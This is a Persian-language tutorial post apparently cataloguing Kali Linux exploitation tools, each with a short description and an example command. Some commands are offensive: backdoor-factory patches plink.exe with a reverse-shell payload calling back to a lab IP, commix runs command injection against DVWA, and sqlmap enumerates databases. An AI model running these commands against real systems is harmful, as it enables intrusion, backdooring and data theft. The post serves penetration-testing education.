در امنیت اطلاعات Exploit کردن یا بهره برداری به فرآیندی گفته میشود که در آن هکر با استفاده از ابزار های مختلف به نقاط ضعف (Vulnerability) یک سیستم حمله میکند و پس از آن کنترل سیستم یا برنامه های آن سیستم را در دست میگیرد. و یا اینکه در این حمله عمل Privilege escalation یا Denial of Service اتفاق میافتد. در این پست با ابزارهای بهره برداری (Exploitation Tools) سیستم عامل کالی آشنا خواهید شد.


معرفی ابزارهای بهره برداری کالی (حروف A , B , C)


دستور armitage

برنامه Armitage یک ابزار برای همکاری تیمی میباشد که کار آن در Metasploit تصویر سازی از سیستم هدف، پیشنهاد Exploit کردن، و نشان دادن ویژگیهای پیشرفته بهر برداری در Framewok است. همانطور که متوجه شدید Armitage یک برنامه تیمی میباشد که به کل تیم اجازه میدهد از یک Session استفاده کنند، Host ها را به اشتراک بگذارند، داده ها را ضبط کنند، و فایلها را دانلود کنند، ربات های را برای خودکار نمودن وظایف Red Team اجرا کنند.

برای استفاده تیمی از ابزار Armitage باید از دستور teamserver و armitage استفاده کنید. نحوه استفاده از این دو دستور به شکل زیر میباشد:

root@kali:~# teamserver

root@kali:~# armitage

دستور backdoor-factory

Backdoor Factory یا BDF یک ابزار است که به شما اجازه میدهد تا Binaries ها را با Shellcode وصله یا Patch کنید. و ادامه بدهید اجرای Binary های که در وضعیت Pre-Patched قرار دارند. نحوه نوشتن دستور backdoor-factory به شکل زیر میباشد:

root@kali:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp

دستور beef-xss

برنامه beef یا فریم ورک بهره برداری از مرورگر یک ابزار تست نفوذ برای Exploit کردن مرورگر ها میباشد. برنامه beef اجازه میدهد تا حرفه ای های تست نفوذ بتوانند وضعیت حقیقی امنیت محیط مورد هدف را با استفاده از Vector های سمت سرویس گیرنده ارزیابی کنند. نحوه نوشتن دستور beef-xss به شکل زیر میباشد:

root@kali:~# beef-xss

دستور CAT

برنامه CAT یا Cisco Auditing Tool یک اسکریپت Perl میباشد که هدف آن بررسی آسیب پذیری های عمومی در Router های سیسکو میباشد. نحوه نوشتن دستور CAT به شکل زیر است:

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst

دستور cge.pl

برنامه CGE یا Cisco Global Exploiter یک ابزار پیشرفته و سریع برای تست امنیت Router های سیسکو میباشد. نحوه نوشتن دستور cge.pl به شکل زیر است:

root@kali:~# cge.pl 192.168.99.230 3

دستور cisco-ocs

دستور cisco-ocs یک ابزار ساده جهت بررسی یک Range از آدرس های IP میباشد تا دستگاههای سیسکو را پیدا کند و روی آنها Telnet را با نام کاربری و رمز عبور cisco بررسی کند. نحوه نوشتن دستور cisco-ocs به شکل زیر میباشد:

root@kali:~# cisco-ocs 192.168.99.200 192.168.99.202

دستور cisco-torch

برنامه cisco-torch یک ابزار کامل جهت اسکن کردن – اثر انگشت برداری – و بهره برداری میباشد. از مزیت های ابزار cisco-torch میتوان به اجرای چندین Process اسکن در پس زمینه برای افزایش تاثیر گذاری هر چه بیشتر فرایند اسکن اشاره نمود. برنامه cisco-torch از چندین روش Fingerprint به صورت همزمان استفاده میکند تا در صورت نیاز سریعا دستگاههای سیسکو که پروتکلهای SSH یا Telnet و یا سرویس SNMP فعال دارند را پیدا کند. نحوه نوشتن دستور cisco-torch به صورت زیر است:

root@kali:~# cisco-torch -A 192.168.99.202

دستور commix

برنامه commix یک ابزار تزریق (Injection) و بهره برداری (Exploitation) میباشد که معمولا توسط توسعه دهندگان وب و مدیران امنیت و تست نفوذ مورد استفاده قرار میگیرد تا برنامه های تحت وب را برای پیدا کردن Bug ها، خطاها، و آسیب پذیری ها بررسی کند. نحوه استفاده از دستور commix به صورت زیر است:

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \

> --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \

> --data='ip=INJECT_HERE&Submit=Submit'

دستور crackle

شما میتوانید با استفاده از ابزار crackle از نقص فرایند BLE Pairing در ارتباط Bluetooth استفاده کنید و به سرعت TK یا Temporary Key را حدس بزنید و پس از آن با استفاده از داده های جمع شده TK کدهای STK و LTK را نیز جمع آوری کنید. در آخر میتوانید کلیه ارتباط ها بین Master و Slave را Decrypt و یا کد گشایی کنید. نحوه استفاده از دستور crackle به صورت زیر است:

root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap

معرفی ابزارهای بهره برداری کالی (حروف J , L , M)


دستور searchsploit

همانطور که از نام ابزار searchsploit پیداست این برنامه برای جستجو کردن و Exploit کردن Database مورد استفاده قرار میگیرد و به شما اجازه میدهد نسخه ای از پایگاه داده Exploit شده را برای خود داشته باشید. نحوه استفاده از دستور searchsploit به صورت زیر است:

root@kali:~# searchsploit oracle windows remote

دستور jboss-autopwn

اسکریپت JBoss مستقر میکند یک JSP Shell را در سرور مورد هدف AS و پس از مستقر شدن اسکریپت، قابلیت اجرای دستورات برای ایجاد Session غیر تعاملی ارائه میشوند. از ویژگیهای این برنامه میتوان به پشتیبانی از چندین Platform مثل Windows و Linux و Mac و یا پشتیبانی از Reverse bind Shell اشاره نمود. نحوه استفاده از دستور به شکل زیر میباشد:

root@kali:~# root@kali:~# jboss-win

root@kali:~# jboss-linux

root@kali:~# jboss-linux 192.168.1.200 8080 2> /dev/null

دستور linux-exploit-suggester

همانطور که از نام این ابزار پیداست این برنامه مخصوص پیشنهاد کردن Exploit میباشد. بدون هیچ ظاهر سازی linux-exploit-suggester یک اسکریپت ساده میباشد که هدف آن دنبال کردن آسیب پذیری ها و پیشنهاد کردن Exploit های ممکن و قابل استفاده میباشد. نحوه استفاده از دستور linux-exploit-suggester به صورت زیر است:

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

برنامه Maltego Teeth

برنامه Maltego یک پلتفرم منحصر بفرد در زمینه انتقال تصویر تهدیدات به محیط سازمان است. مزیت منحصر بفرد Maltego نمایش پیچیدگی و سختی یک نقطه از خرابی ها به همراه ارتباطات مطمئن میباشد که در یک محوطه از ساختار سازمان شما وجود دارد. با استفاده از برنامه Maltego میتوانید ارتباطات واقعی بین مردم و گروه های مردمی (Social Network) و کمپانی ها و سازمانها و وب سایت ها و دامنه ها و نام های DNS و Netblock ها و آدرسهای IP و … را پیدا کنید.

root@kali:~# cat /opt/Teeth/README.txt

معرفی ابزارهای بهره برداری کالی (حروف S , T , Y)


دستور SET

جعبه ابزار مهندسی اجتماعی SET در واقع یک Framework تست نفوذ میباشد که مخصوص مهندسی اجتماعی یا Social Engineering طراحی شده است. در این جعبه ابزار Attack Vector های شخصی سازی شده زیادی وجود دارد که به شما اجازه میدهند تا حملات قابل درکی را در کسری از زمان انجام دهید. نحوه نوشتن دستور setoolkit به شکل زیر میباشد:

root@kali:~# setoolkit

دستور shellnoob

نوشتن کدهای Shell همیشه همانند یک سرگرمی بوده است. اما بعضی از بخشهای این عمل هم کمی حوصله سر بر است چرا که خطاهای زیادی را باید برطرف نمود. با استفاده از ShellNoob میتوانید با یک زبان کدهای خود را بنویسید سپس آنها را به زبانهای مختلف Shell مثل Bin – Hex – Obj – exe – C – Python – Ruby – Pretty و … تبدیل کنید. نحوه نوشتن دستور shellnoob به شکل زیر میباشد:

root@kali:~# shellnoob -i --to-opcode

دستور sqlmap

برنامه sqlmap یک ابزار تست نفوذ میباشد که هدف آن خودکار نمودن فرایند تشخیص و بهره برداری از مشکلات SQL Injection در جهت کنترل کردن Database Server است. از مزیت های ابزار sqlmap وجود موتور تشخیص قدرتمند و ویژگیهای عالی جهت انجام تست های نفوذ نهایی و انجام اثر انگشت برداری از پایگاه های داده و … میباشد.

از دیگر ویژگیهای برنامه sqlmap پشتیبانی از پایگاه داده های MySQL و Oracle و PstgreSQL و Microsoft SQL Server و Microsoft Access و IBM DB2 و SQLite و Firebird و … میباشد. نحوه نوشتن دستور sqlmap به شکل زیر میباشد:

root@kali:~# sqlmap -u "http://192.168.1.250/?p=1&forumaction=search" --dbs

جعبه ابزار thc-ipv6

thc-ipv6 یک جعبه ابزار کامل جهت حمله به ضعف های ذاتی پروتکل IPV6 و پروتکل ICMP6 میباشد به همراه Packet Factory Library که استفاده از آسان است. نحوه نوشتن دستورات جعبه ابزار thc-ipv6 از قرار زیر میباشد:

root@kali:~# 6to4test.sh

root@kali:~# address6

root@kali:~# alive6

root@kali:~# covert_send6

root@kali:~# covert_send6d

root@kali:~# denial6

root@kali:~# detect-new-ip6

root@kali:~# detect_sniffer6

root@kali:~# dnsdict6

root@kali:~# dnsrevenum6

دستور yersinia

برنامه yersinia یک Framework برای حمله به لایه دو شبکه (Data Link Layar) میباشد. برنامه yersinia از ضعف پروتکلهای مختلف شبکه استفاده میکند. نحوه استفاده از دستور yersinia به صورت زیر است:

root@kali:~# yersinia -G